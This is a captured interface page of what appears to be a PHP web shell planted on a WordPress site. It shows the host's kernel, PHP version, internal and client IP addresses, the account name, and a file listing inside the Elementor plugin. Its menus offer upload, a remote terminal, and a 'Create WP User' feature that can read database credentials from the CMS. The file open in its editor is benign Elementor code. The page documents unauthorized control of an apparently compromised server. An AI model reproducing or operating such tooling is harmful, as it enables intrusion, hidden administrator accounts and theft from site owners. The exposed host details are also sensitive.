Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
elementor
/
app
/
modules
/
import-export
/
compatibility
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
base-adapter.php
768.00 B
-rw-r--r--
2026-02-24 12:19
envato.php
2.95 KB
-rw-r--r--
2026-02-24 12:19
kit-library.php
754.00 B
-rw-r--r--
2026-02-24 12:19
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
base-adapter.php
<?php namespace Elementor\App\Modules\ImportExport\Compatibility; use Elementor\App\Modules\ImportExport\Import; use Elementor\Core\Base\Base_Object; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } abstract class Base_Adapter { /** * @param array $manifest_data * @param array $meta * @return false */ public static function is_compatibility_needed( array $manifest_data, array $meta ) { return false; } public function adapt_manifest( array $manifest_data ) { return $manifest_data; } public function adapt_site_settings( array $site_settings, array $manifest_data, $path ) { return $site_settings; } public function adapt_template( array $template_data, array $template_settings ) { return $template_data; } }
关闭
保存